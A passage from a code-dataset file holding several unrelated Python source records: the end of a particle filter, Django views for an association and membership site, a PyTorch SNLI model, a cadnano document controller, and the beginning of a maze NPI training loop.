sigma = 1\n x = observed_distance\n weight = (1/(sigma*np.sqrt(2*np.pi))) * np.exp(-0.5*(((x-mu)/sigma)**2))\n\n return weight\n \n","sub_path":"particle_filter_student/scripts/Particle_Filter.py","file_name":"Particle_Filter.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"186527176","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect,get_object_or_404\n\nfrom django.contrib.auth.decorators import login_required\nfrom Cotisation.models import *\nfrom datetime import date, timedelta\nfrom Comif.models import Client\n\n# Create your views here.\n\n\n@login_required(login_url=\"/\")\ndef index(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n error = {}\n if request.method == 'POST':\n error = accept_formular(request, user, error)\n\n association_cotise = Cotisation.objects.filter(personne = user)\n comptes = Client.objects.filter(utilisateur = user)\n print(comptes)\n return render(request, 'client/client.html', locals())\n\n\ndef accept_formular(request, user, error):\n if request.FILES.has_key('photo'):\n user.photo = request.FILES['photo']\n \n if request.POST.has_key('pseudo') and request.POST['pseudo'] != \"\":\n users = Utilisateur.objects.filter(username = request.POST['pseudo'])\n if len(users) > 0 and users[0] != user:\n error['pseudo'] = \"Ce pseudo est déjà utilisé\"\n elif len(users) == 0:\n user.username = request.POST['pseudo']\n \n if request.POST.has_key('nom'):\n if request.POST['nom'] != \"\":\n user.last_name = request.POST['nom']\n else:\n error['nom'] = \"Le nom est obligatoire\"\n \n if request.POST.has_key('prenom'):\n if request.POST['prenom'] != \"\":\n user.first_name = request.POST['prenom']\n else:\n error['prenom'] = \"Le prénom est obligatoire\"\n \n if request.POST.has_key('dateNaissance'):\n if request.POST['dateNaissance'] != \"\":\n user.date_naissance = request.POST['dateNaissance']\n\n if request.POST.has_key('mail') and request.POST['mail'] != \"\":\n if \"@etu.emse.fr\" in request.POST['mail']:\n user.email = request.POST['mail']\n else:\n error['mail'] = \"Veuillez donner votre adresse EMSE\"\n\n if request.POST.has_key('adresse'):\n if request.POST['adresse'] != \"\":\n user.adresse = request.POST['adresse']\n else:\n error['adresse'] = \"L'adresse est obligatoire\"\n\n user.save()\n return error\n\n\n@login_required(login_url=\"/\")\ndef associations_client(request, association_vise=\"\"):\n if association_vise != \"\": \n association_visible = get_object_or_404(Association, pk=association_vise)\n else:\n association_visible = \"\"\n associations = Association.objects.all()\n user_association = []\n user_poste = []\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n for association in Cotisation.objects.filter(personne=user):\n user_association.append(association.association)\n for poste in association.poste():\n user_poste.append(poste.pk)\n return render(request, 'client/mes_associations.html', locals())\n\n\n@login_required(login_url=\"/\")\ndef paye_cotisation(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n if request.method == 'POST' and request.POST.has_key(\"choix_asso\"):\n prix_total = 0\n poste_candidat = []\n associations = []\n\n for cotisation in user.cotisation_set.all():\n for poste in Poste.objects.filter(association=cotisation.association):\n if user in poste.candidat.all():\n poste.candidat.remove(user)\n poste.save()\n\n for key, value in request.POST.items():\n print(key + \"\\n\")\n if 'association' in key:\n association = get_object_or_404(Association, pk=value)\n if len(Cotisation.objects.filter(personne = user, association=association)) == 0:\n prix_total += association.prix_cotisation\n associations.append(association)\n elif 'poste' in key:\n poste = get_object_or_404(Poste, pk=value)\n poste_candidat.append(poste)\n if not user in poste.personne.all():\n poste.candidat.add(user)\n poste.save()\n if prix_total > 0:\n return render(request, 'client/paye_cotisation.html', locals())\n else:\n return redirect('client.mes_associations')\n else:\n return redirect('client.mes_associations')\n\n\n@login_required(login_url=\"/\")\ndef mes_evenement(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n evenements = Evenement.objects.filter(startDate__gt=date.today()).order_by('startDate')\n for event in evenements:\n if event.is_full():\n evenements = evenements.exclude(event)\n return render(request, 'client/mes_evenement.html', locals()) \n\n\n@login_required(login_url=\"/\")\ndef paye_evenement(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n if request.method == 'POST':\n prix_total_event = 0\n\n for event in Evenement.objects.filter(startDate__gt=date.today()).order_by('association'):\n if user in event.candidat.all():\n event.candidat.remove(user)\n event.save()\n for key, value in request.POST.items():\n if 'event' in key:\n event = get_object_or_404(Evenement, pk=value)\n if not event.is_full() and not user in event.participant.all():\n event.candidat.add(user)\n prix_total_event += event.prix\n event.candidat.add(user)\n event.save()\n if prix_total_event != 0:\n evenements = user.evenement_set.all()\n return render(request, 'client/paye_evenement.html', locals())\n else:\n return redirect('client.mes_evenement')\n else:\n return redirect('client.mes_evenement')\n \n\n@login_required(login_url=\"/\")\ndef mes_votes(request):\n user = get_object_or_404(Utilisateur, pk=request.user.pk)\n\n if request.method == \"POST\":\n for key, value in request.POST.items():\n if \"vote_\" in key and value != \"NULL\":\n pk = key.split('_')[1]\n vote = get_object_or_404(Vote, pk=pk)\n reponse = get_object_or_404(Reponse, pk=value)\n if reponse in vote.reponse.all() and user in vote.user():\n reponse.nb_reponse += 1\n vote.user_answered.add(user)\n reponse.save()\n vote.save()\n\n cotisations = Cotisation.objects.filter(personne=user)\n votes = Vote.objects.none()\n votes_finis = Vote.objects.none()\n\n for elt in cotisations:\n votes = votes | elt.association.vote_set.filter(endDate__gt=date.today()-timedelta(1))\n votes_finis = votes_finis | elt.association.vote_set.filter(endDate__lt=date.today()-timedelta(1))\n for vote in elt.association.vote_set.filter(endDate__gt=date.today()-timedelta(1)):\n if not (user in vote.user()) or (user in vote.user_answered.all()):\n votes = votes.exclude(pk=vote.pk)\n\n for vote in elt.association.vote_set.filter(endDate__lt=date.today()):\n if not (user in vote.user()):\n votes_finis = votes.exclude(pk=vote.pk)\n\n votes_finis.order_by('startDate')\n \n return render(request, 'client/mes_votes.html', locals())\n\n\ndef position_to_index(obj):\n \"\"\"\n Return the index related to the object position in the description grid\n :param obj: Define the content of the pointed grid case\n :return: index of the case\n \"\"\"\n position = obj.position\n if position == 'gauche':\n position = 0\n elif position == 'centre':\n position = 1\n else:\n position = 2\n return position\n\n\ndef evenement_description(request, event=\"\"):\n evenement = get_object_or_404(Evenement, pk=event)\n\n row_descriptor_list = [] # Ensemble of description rows\n description = RowDescription.objects.none()\n try:\n description = evenement.row_descriptor.descriptions.all().order_by('position')\n except EvenementDescription.DoesNotExist:\n pass\n\n for row_descriptor in description:\n\n # Collects images and their respective position.\n # Store these images in the row_descriptor_sorted list\n\n # Store the offset of displaying\n disposition_case = row_descriptor.disposition_case\n nombre_element = len(row_descriptor.texts.all()) + len(row_descriptor.images.all())\n if disposition_case == 'centre':\n disposition_case = 1\n elif disposition_case == 'droite':\n if row_descriptor.fusion:\n disposition_case = 1\n else:\n disposition_case = 3 - nombre_element\n else:\n disposition_case = 0\n\n row_descriptor_sorted = ['', '', ''] # Represent a row of the description with it content sorted\n\n # Collect image and text then fill a list with these contents sorted from left to right\n for image in row_descriptor.images.all():\n position = position_to_index(image)\n row_descriptor_sorted[position] = image\n for text in row_descriptor.texts.order_by('pk'):\n position = position_to_index(text)\n row_descriptor_sorted[position] = text\n\n compteur = 0\n for elt in row_descriptor_sorted:\n if elt == \"\":\n compteur += 1\n\n # Store the current description row\n row_descriptor_list.append({\n 'content': list(row_descriptor_sorted),\n 'offset': disposition_case,\n 'fusion': row_descriptor.fusion,\n 'taille_fusion': row_descriptor.nombre_case * 4,\n 'pk_row': row_descriptor.pk\n\n })\n\n print(row_descriptor_list)\n\n return render(request, 'client/descriptionEvent.html', {\n 'evenement': evenement,\n 'descriptions': row_descriptor_list,\n })\n\n","sub_path":"Client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157625056","text":"from torch.nn import Module\r\nfrom utils.bi_lstm_sequence_model import SequenceEncoderModel\r\nfrom utils.cnn_character_level_model import CharacterCnnEmbed\r\nfrom utils.nn_top_layer_model import TopLayerModel\r\nfrom utils.params import SNLIFullModelParams\r\n\r\n\r\nclass SNLIModel(Module):\r\n def __init__(self, params: SNLIFullModelParams):\r\n super(SNLIModel, self).__init__()\r\n self._chr_embed_model = CharacterCnnEmbed(params.CHARACTER_params) # character embed (CNN)\r\n self._seq_model = SequenceEncoderModel(params.SEQUENSE_premise_params) # premise to vec (LSTM)\r\n # self._hypothesis_seq_model = SequenceEncoderModel(params.SEQUENCE_hypothesis_params)# hypothesis to vec (LSTM)\r\n self._top_layer_model = TopLayerModel(params.TOP_LAYAER_params) # combine with (NN)\r\n self.optimizer = self.set_optimizer(params.LEARNING_RATE, params.OPTIMIZER)\r\n\r\n # init optimizer with RMS_prop\r\n def set_optimizer(self, lr, opt):\r\n return opt(self.parameters(), lr=lr)\r\n\r\n def forward(self, premise_words, premise_chr, hypothesis_words, hypothesis_chr):\r\n premise_v = self._seq_model(premise_words, self._chr_embed_model(premise_chr))\r\n hypothesis_v = self._seq_model(hypothesis_words, self._chr_embed_model(hypothesis_chr))\r\n return self._top_layer_model(premise_v, hypothesis_v)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import os\r\n from utils.data_loader import SNLIDataset\r\n from utils.params import TRAIN_SRC, PRE_TRAINED_SRC, ChrLevelCnnParams, SequenceEncoderParams, TopLayerParams\r\n from torch.utils.data import DataLoader\r\n\r\n ds = SNLIDataset(os.path.join(\"..\", TRAIN_SRC), os.path.join(\"..\", PRE_TRAINED_SRC))\r\n params = SNLIFullModelParams(ChrLevelCnnParams(chr_vocab_dim=ds.len_chars_vocab),\r\n SequenceEncoderParams(word_vocab_dim=ds.len_words_vocab, pre_trained=ds.word_embed_mx),\r\n SequenceEncoderParams(word_vocab_dim=ds.len_words_vocab, pre_trained=ds.word_embed_mx),\r\n TopLayerParams())\r\n model = SNLIModel(params)\r\n dl = DataLoader(\r\n dataset=ds,\r\n batch_size=64,\r\n collate_fn=ds.collate_fn\r\n )\r\n for i, (p, h, pw, hw, pc, hc, label) in enumerate(dl):\r\n out = model(pw, pc, hw, hc)\r\n e = 0\r\n","sub_path":"utils/snli_full_model.py","file_name":"snli_full_model.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"388059808","text":"# The MIT License\n#\n# Copyright (c) 2011 Wyss Institute at Harvard University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n# http://www.opensource.org/licenses/mit-license.php\n\nimport os.path\nfrom cadnano import app\nfrom model.document import Document\nfrom model.encoder import encode\nfrom model.decoder import decode\nfrom model.enum import StrandType\nfrom model.enum import LatticeType\nfrom views.documentwindow import DocumentWindow\nfrom views.pathview.pathhelixgroup import PathHelixGroup\nfrom views.sliceview.honeycombslicegraphicsitem import HoneycombSliceGraphicsItem\nfrom views.sliceview.squareslicegraphicsitem import SquareSliceGraphicsItem\nfrom views.pathview.handles.activeslicehandle import ActiveSliceHandle\nfrom views import styles\n\nif app().isInMaya():\n from views.solidview.solidhelixgroup import SolidHelixGroup\n\nimport util\n# import Qt stuff into the module namespace with PySide, PyQt4 independence\nutil.qtWrapImport('QtCore', globals(), ['pyqtSignal', 'QString',\n 'QStringList', 'QFileInfo', 'Qt',\n 'QEvent'])\nutil.qtWrapImport('QtGui', globals(), ['QUndoStack', 'QFileDialog',\n 'QAction', 'QApplication',\n 'QMessageBox', 'QKeySequence'])\n\n\nclass DocumentController():\n \"\"\"\n The document controller. Hooks high level (read file/write file, add\n submodel, etc) UI elements to their corresponding actions in the model\n \"\"\"\n def __init__(self, doc=None, fname=None):\n app().documentControllers.add(self)\n if doc != None and doc._undoStack != None:\n self._undoStack = doc._undoStack\n else:\n self._undoStack = QUndoStack()\n self._undoStack.setClean()\n self._undoStack.cleanChanged.connect(\n self.undoStackCleanStatusChangedSlot)\n self._filename = fname if fname else \"untitled.nno\"\n self._activePart = None\n self.sliceGraphicsItem = None\n self.pathHelixGroup = None\n self._hasNoAssociatedFile = fname == None\n self.win = DocumentWindow(docCtrlr=self)\n self.win.closeEvent = self.closer\n self.win.changeEvent = self.changed\n self.connectWindowEventsToSelf()\n self.win.show()\n self._document = None\n self.setDocument(Document() if not doc else doc)\n app().undoGroup.addStack(self.undoStack())\n self.win.setWindowTitle(self.documentTitle() + '[*]')\n #self.solidHelixGrp = None\n if doc != None and doc.parts():\n doc.parts()[0].needsFittingToView.emit()\n\n def closer(self, event):\n if self.maybeSave():\n if app().testRecordMode:\n self.win.sliceController.testRecorder.generateTest()\n event.accept()\n else:\n event.ignore()\n\n def changed(self, event):\n if (event.type() == QEvent.ActivationChange or\n event.type() == QEvent.WindowActivate or\n event.type() == QEvent.ApplicationActivate):\n if self.win.isActiveWindow() and app().activeDocument != self:\n app().activeDocument = self\n if hasattr(self, 'solidHelixGrp'):\n if self.solidHelixGrp:\n self.solidHelixGrp.deleteAllMayaNodes()\n self.solidHelixGrp.onPersistentDataChanged()\n\n def documentTitle(self):\n fname = os.path.basename(str(self.filename()))\n if not self.undoStack().isClean():\n fname += '[*]'\n return fname\n\n def filename(self):\n return self._filename\n\n def setFilename(self, proposedFName):\n if self._filename == proposedFName:\n return True\n self._filename = proposedFName\n self._hasNoAssociatedFile = False\n self.win.setWindowTitle(self.documentTitle())\n return True\n\n def activePart(self):\n if self._activePart == None:\n self._activePart = self._document.selectedPart()\n return self._activePart\n\n def setActivePart(self, part):\n # should be document.selectedPart\n self._activePart = part\n\n def document(self):\n return self._document\n\n def setDocument(self, doc):\n self._document = doc\n doc.setController(self)\n doc.partAdded.connect(self.docPartAddedEvent)\n for p in doc.parts():\n self.docPartAddedEvent(p)\n\n def undoStack(self):\n return self._undoStack\n\n def connectWindowEventsToSelf(self):\n \"\"\"Organizational method to collect signal/slot connectors.\"\"\"\n self.win.actionNewHoneycombPart.triggered.connect(self.hcombClicked)\n self.win.actionNewSquarePart.triggered.connect(self.squareClicked)\n self.win.actionNew.triggered.connect(app().newDocument)\n self.win.actionOpen.triggered.connect(self.openClicked)\n self.win.actionClose.triggered.connect(self.closeClicked)\n self.win.actionSave.triggered.connect(self.saveClicked)\n self.win.actionSVG.triggered.connect(self.svgClicked)\n self.win.actionAutoStaple.triggered.connect(self.autoStapleClicked)\n self.win.actionCSV.triggered.connect(self.exportCSV)\n self.win.actionPreferences.triggered.connect(app().prefsClicked)\n self.win.actionSave_As.triggered.connect(self.saveAsClicked)\n # self.win.actionQuit.triggered.connect(self.closeClicked)\n # self.win.actionAdd.triggered.connect(self.addClicked)\n # self.win.actionDelete.triggered.connect(self.deleteClicked)\n # self.win.actionCut.triggered.connect(self.cutClicked)\n # self.win.actionPaste.triggered.connect(self.pasteClicked)\n # self.win.actionMoveUp.triggered.connect(self.moveUpClicked)\n # self.win.actionMoveDown.triggered.connect(self.moveDownClicked)\n # self.win.actionPromote.triggered.connect(self.promoteClicked)\n # self.win.actionDemote.triggered.connect(self.demoteClicked)\n # end def\n\n def undoStackCleanStatusChangedSlot(self):\n self.win.setWindowModified(not self.undoStack().isClean())\n # The title changes to include [*] on modification\n self.win.setWindowTitle(self.documentTitle())\n\n def newClicked(self):\n \"\"\"Create a new document window\"\"\"\n # Will create a new Document object and will be\n # be kept alive by the app's document list\n DocumentController()\n\n def openClicked(self):\n \"\"\"docstring for openClicked\"\"\"\n # self.filesavedialog = None\n # self.openFile('/Users/nick/Downloads/nanorobot.v2.json')\n # return\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getOpenFileName(\n None,\n \"Open Document\", \"/\",\n \"CADnano1 / CADnano2 Files (*.nno *.json *.cadnano)\")\n self.filesavedialog = None\n self.openFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"Open Document\",\n \"/\",\n \"CADnano1 / CADnano2 Files (*.nno *.json *.cadnano)\")\n fdialog.setAcceptMode(QFileDialog.AcceptOpen)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(self.openFile)\n fdialog.open() # or .show(), or .open()\n\n def openFile(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if not fname or os.path.isdir(fname):\n return False\n fname = str(fname)\n doc = decode(file(fname).read())\n doc.finalizeImport() # updates staple highlighting\n DocumentController(doc, fname)\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(self.openFile)\n # manual garbage collection to prevent hang (in osx)\n del self.filesavedialog\n # end def\n\n def exportSequenceCSV(self, fname):\n \"\"\"Export all staple sequences to CSV file fnane.\"\"\"\n output = self.activePart().getStapleSequences()\n f = open(fname, 'w')\n f.write(output)\n f.close()\n # end def\n\n def exportCSV(self):\n fname = self.filename()\n if fname == None:\n directory = \".\"\n else:\n directory = QFileInfo(fname).path()\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getSaveFileName(\n self.win,\n \"%s - Export As\" % QApplication.applicationName(),\n directory,\n \"(*.csv)\")\n self.filesavedialog = None\n self.exportFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"%s - Export As\" % QApplication.applicationName(),\n directory,\n \"(*.csv)\")\n fdialog.setAcceptMode(QFileDialog.AcceptSave)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(self.exportFile)\n fdialog.open()\n # end def\n\n def exportFile(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".csv\"):\n fname += \".csv\"\n # self.setFilename(fname)\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(self.exportFile)\n # manual garbage collection to prevent hang (in osx)\n del self.filesavedialog\n return self.exportSequenceCSV(fname)\n # end def\n\n def closeClicked(self):\n \"\"\"This will trigger a Window closeEvent\"\"\"\n if util.isWindows():\n self.win.close()\n\n def maybeSave(self):\n \"\"\"\n Save on quit, check if document changes have occured.\n \"\"\"\n if app().dontAskAndJustDiscardUnsavedChanges:\n return True\n if not self.undoStack().isClean(): # document dirty?\n savebox = QMessageBox(QMessageBox.Warning, \"Application\",\n \"The document has been modified.\\nDo you want to save your changes?\",\n QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel,\n self.win,\n Qt.Dialog | Qt.MSWindowsFixedSizeDialogHint | Qt.Sheet)\n savebox.setWindowModality(Qt.WindowModal)\n save = savebox.button(QMessageBox.Save)\n discard = savebox.button(QMessageBox.Discard)\n cancel = savebox.button(QMessageBox.Cancel)\n save.setShortcut(\"Ctrl+S\")\n discard.setShortcut(QKeySequence(\"D,Ctrl+D\"))\n cancel.setShortcut(QKeySequence(\"C,Ctrl+C,.,Ctrl+.\"))\n ret = savebox.exec_()\n del savebox # manual garbage collection to prevent hang (in osx)\n if ret == QMessageBox.Save:\n return self.saveAsClicked()\n elif ret == QMessageBox.Cancel:\n return False\n return True\n\n def writeToFile(self, filename=None):\n if filename == None:\n assert(not self._hasNoAssociatedFile)\n filename = self.filename()\n try:\n f = open(filename, 'w')\n encode(self._document, f)\n f.close()\n except IOError:\n flags = Qt.Dialog | Qt.MSWindowsFixedSizeDialogHint | Qt.Sheet\n errorbox = QMessageBox(QMessageBox.Critical,\n \"CaDNAno\",\n \"Could not write to '%s'.\" % filename,\n QMessageBox.Ok,\n self.win,\n flags)\n errorbox.setWindowModality(Qt.WindowModal)\n errorbox.open()\n return False\n self.undoStack().setClean()\n self.setFilename(filename)\n return True\n\n def saveClicked(self):\n if self._hasNoAssociatedFile or self._document._importedFromJson:\n self.openSaveFileDialog()\n return\n self.writeToFile()\n\n def saveAsClicked(self):\n self.openSaveFileDialog()\n\n def openSaveFileDialog(self):\n fname = self.filename()\n if fname == None:\n directory = \".\"\n else:\n directory = QFileInfo(fname).path()\n if util.isWindows(): # required for native looking file window\n fname = QFileDialog.getSaveFileName(\n self.win,\n \"%s - Save As\" % QApplication.applicationName(),\n directory,\n \"%s (*.nno)\" % QApplication.applicationName())\n self.writeToFile(fname)\n else: # access through non-blocking callback\n fdialog = QFileDialog(\n self.win,\n \"%s - Save As\" % QApplication.applicationName(),\n directory,\n \"%s (*.nno)\" % QApplication.applicationName())\n fdialog.setAcceptMode(QFileDialog.AcceptSave)\n fdialog.setWindowFlags(Qt.Sheet)\n fdialog.setWindowModality(Qt.WindowModal)\n # fdialog.exec_() # or .show(), or .open()\n self.filesavedialog = fdialog\n self.filesavedialog.filesSelected.connect(\n self.saveFileDialogCallback)\n fdialog.open()\n\n def saveFileDialogCallback(self, selected):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".nno\"):\n fname += \".nno\"\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(\n self.saveFileDialogCallback)\n del self.filesavedialog # prevents hang\n self.writeToFile(fname)\n # end def\n\n def svgClicked(self):\n if isinstance(selected, QStringList) or isinstance(selected, list):\n fname = selected[0]\n else:\n fname = selected\n if fname.isEmpty() or os.path.isdir(fname):\n return False\n fname = str(fname)\n if not fname.lower().endswith(\".svg\"):\n fname += \".svg\"\n self.setFilename(fname)\n if self.filesavedialog != None:\n self.filesavedialog.filesSelected.disconnect(self.saveFile)\n del self.filesavedialog\n return self.svgClicked()\n # end def\n\n def hcombClicked(self):\n \"\"\"docstring for hcombClicked\"\"\"\n self.addHoneycombHelixGroup()\n # end def\n\n def squareClicked(self):\n \"\"\"docstring for squareClicked\"\"\"\n self.addSquareHelixGroup()\n # end def\n\n def autoStapleClicked(self):\n self.activePart().autoStaple()\n\n ############# Spawning / Destroying HoneycombSliceGraphicsItems ##########\n ##################### and PathHelixGroups for Parts ######################\n def docPartAddedEvent(self, part):\n if part.crossSectionType() == LatticeType.Honeycomb:\n self.sliceGraphicsItem = HoneycombSliceGraphicsItem(part,\n controller=self.win.sliceController,\n parent=self.win.sliceroot)\n else:\n self.sliceGraphicsItem = SquareSliceGraphicsItem(part,\n controller=self.win.sliceController,\n parent=self.win.sliceroot)\n self.pathHelixGroup = PathHelixGroup(part,\n controller=self.win.pathController,\n parent=self.win.pathroot)\n\n if app().isInMaya():\n self.solidHelixGrp = SolidHelixGroup(\n part,\n controller=self.win.pathController,\n htype=part.crossSectionType())\n\n self.win.sliceController.activeSliceLastSignal.connect(\n self.pathHelixGroup.activeSliceHandle().moveToLastSlice)\n self.win.sliceController.activeSliceFirstSignal.connect(\n self.pathHelixGroup.activeSliceHandle().moveToFirstSlice)\n self.win.pathController.setActivePath(self.pathHelixGroup)\n self.win.actionFrame.triggered.connect(self.pathHelixGroup.zoomToFit)\n\n for vh in part.getVirtualHelices():\n xos = vh.get3PrimeXovers(StrandType.Scaffold)\n for xo in xos:\n toBase = (xo[1][0], xo[1][2])\n self.pathHelixGroup.createXoverItem(\n xo[0], toBase, StrandType.Scaffold)\n xos = vh.get3PrimeXovers(StrandType.Staple)\n for xo in xos:\n toBase = (xo[1][0], xo[1][2])\n self.pathHelixGroup.createXoverItem(\n xo[0], toBase, StrandType.Staple)\n # end for\n self.setActivePart(part)\n\n # end def\n\n def addHoneycombHelixGroup(self):\n \"\"\"Adds a honeycomb DNA part to the document. Dimensions are set by\n the Document addDnaHoneycombPart method.\"\"\"\n dnaPart = self._document.addDnaHoneycombPart()\n self.setActivePart(dnaPart)\n if app().testRecordMode:\n self.win.sliceController.testRecorder.setPart(\n dnaPart.crossSectionType())\n # end def\n\n def addSquareHelixGroup(self):\n \"\"\"Adds a square DNA part to the document. Dimensions are set by\n the Document addDnaSquarePart method.\"\"\"\n dnaPart = self._document.addDnaSquarePart()\n self.setActivePart(dnaPart)\n if app().testRecordMode:\n self.win.sliceController.testRecorder.setPart(\n dnaPart.crossSectionType())\n # end def\n\n def createAction(self, icon, text, parent, shortcutkey):\n \"\"\"\n returns a QAction object\n \"\"\"\n action = QAction(QIcon(icon), text, parent)\n if not shortcutkey.isEmpty():\n action.setShortcut(shortcutkey)\n return action\n# end class\n","sub_path":"controllers/documentcontroller.py","file_name":"documentcontroller.py","file_ext":"py","file_size_in_byte":20203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96794069","text":"from __future__ import print_function\nimport argparse\nimport os\nimport torch\nimport numpy as np\nfrom Model.npi import NPI\nfrom Model.maze_core import MazeCore\nimport pickle\nfrom Env.maze import Maze_Env, CONFIG\nimport time\nfrom tensorboardX import SummaryWriter\nimport random\n\ntrain_n_iter = 0\nsame_n_iter = 0\ndiff_n_iter = 0\n\ndef run_epoch(npi, mode, cur_data, writer):\n random.shuffle(cur_data)\n global train_n_iter\n global same_n_iter\n global diff_n_iter\n\n if mode != 'train':\n npi.eval()\n else:\n npi.train()\n\n epoch_def_loss = 0.0\n epoch_total_loss = 0.0\n epoch_pro_accs = 0.0\n epoch_ter_accs = 0.0\n epoch_step = 0\n start_time = time.time()\n for maze_idx in range(len(cur_data)):\n start, end, maze, trace = cur_data[maze_idx]\n\n maze_env = Maze_Env(start, end, maze)\n\n x, y = trace[:-1], trace[1:]\n npi.reset_state(1)\n # step_def_loss, step_arg_loss, term_acc, prog_acc, = 0.0, 0.0, 0.0, 0.0\n # arg0_acc, arg1_acc, arg2_acc, num_args = 0.0, 0.0, 0.0, 0\n step_def_loss = 0.0\n step_total_loss = 0.0\n pro_accs = 0.0\n ter_accs = 0.0\n\n for trace_idx in range(len(x)):\n (pro_in_name, pro_in_id), arg_in, ter_in = x[trace_idx]\n (pro_out_name, pro_out_id), arg_out, ter_out = y[trace_idx]\n\n maze_env.execute(pro_in_id, arg_in)\n env_ft = maze_env.encode_env()\n env_ft = torch.from_numpy(env_ft).view(1, -1)\n\n arg_in_ft = maze_env.encode_args(arg_in)\n arg_in_ft = torch.from_numpy(arg_in_ft).view(1, -1)\n arg_out_ft = maze_env.encode_args(arg_out)\n arg_out_ft = torch.from_numpy(arg_out_ft).view(1, -1)\n\n pro_in_ft = np.array([pro_in_id])\n pro_in_ft = torch.from_numpy(pro_in_ft).view(1, -1)\n pro_out_ft = np.array([pro_out_id])\n pro_out_ft = torch.from_numpy(pro_out_ft).view(-1)\n\n ter_out_ft = [1] if ter_out else [0]\n ter_out_ft = np.array(ter_out_ft)\n ter_out_ft = torch.from_numpy(ter_out_ft).view(-1)\n\n if cuda_flag:\n env_ft = env_ft.cuda()\n arg_in_ft = arg_in_ft.cuda()\n arg_out_ft = arg_out_ft.cuda()\n pro_in_ft = pro_in_ft.cuda()\n pro_out_ft = pro_out_ft.cuda()\n ter_out_ft = ter_out_ft.cuda()\n\n pro_pred, arg_pred, ter_pred = npi(env_ft, arg_in_ft, pro_in_ft)\n pred = (pro_pred, arg_pred, ter_pred)\n gt = (pro_out_ft, arg_out_ft, ter_out_ft)\n default_loss, total_loss = npi.cal_loss(pred, gt)\n\n pro_acc, ter_acc = npi.cal_metrics(pred, gt)\n pro_accs += pro_acc\n ter_accs += ter_acc\n\n if mode == 'train':\n # arg is not blank\n if pro_out_id == 0 or pro_out_id == 3 \\\n or pro_out_id == 4 or pro_out_id == 7:\n optimizer.zero_grad()\n total_loss.backward(retain_graph=True)\n optimizer.step()\n else: # ter_loss and pro_loss\n optimizer.zero_grad()\n default_loss.backward(retain_graph=True)\n optimizer.step()\n\n step_def_loss += default_loss.item()\n step_total_loss += total_loss.item()\n\n if maze_idx % 10 == 0:\n print(\"Epoch {0:02d} Maze idx {1:03d} Default Step Loss {2:05f}, \" \\\n \"Total Step Loss {3:05f}, Term Acc: {4:03f}, Prog Acc: {5:03f}\" \\\n .format(curr_epoch, maze_idx, step_def_loss / len(x), step_total_loss / len(x), ter_accs / len(x),\n pro_accs / len(x)))\n\n if mode == 'train':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), train_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), train_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), train_n_iter)\n writer.add_scalar(mode + '/ter_accs', ter_accs / len(x), train_n_iter)\n train_n_iter += 1\n elif mode == 'test_same':\n writer.add_scalar(mode + '/def_loss', step_def_loss / len(x), same_n_iter)\n writer.add_scalar(mode + '/total_loss', step_total_loss / len(x), same_n_iter)\n writer.add_scalar(mode + '/pro_accs', pro_accs / len(x), same_n_iter)\n writer.add_scalar(mode + 